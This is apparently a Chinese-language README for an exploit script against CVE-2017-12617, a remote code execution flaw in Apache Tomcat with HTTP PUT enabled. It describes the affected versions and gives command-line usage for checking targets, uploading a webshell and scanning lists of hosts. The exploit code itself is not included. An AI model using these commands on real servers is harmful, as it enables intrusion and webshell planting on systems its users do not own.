CVE-2017-12617 是在 Apache Tomcat 中发现的一个严重的远程代码执行(RCE)漏洞
影响启用了 HTTP PUT 的系统(通过将 Default servlet 的 "read-only" 初始化参数设置为 "false")均受影响。
9.0.1 (Beta)、8.5.23、8.0.47 和 7.0.82 之前的 Tomcat 版本在所有操作系统上都包含一个潜在危险的
远程代码执行(RCE)漏洞,前提是默认 servlet 配置了参数 readonly 设置为 false,或者启用了 WebDAV servlet 且
参数 readonly 设置为 false
./cve-2017-12617.py [选项]
选项:
-u ,--url [::] 检查目标 URL 是否易受攻击
-p,--pwn [::] 生成 webshell 并上传
-l,--list [::] 主机列表
[+]用法:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hosts.txt
./cve-2017-12617.py --list hosts.txt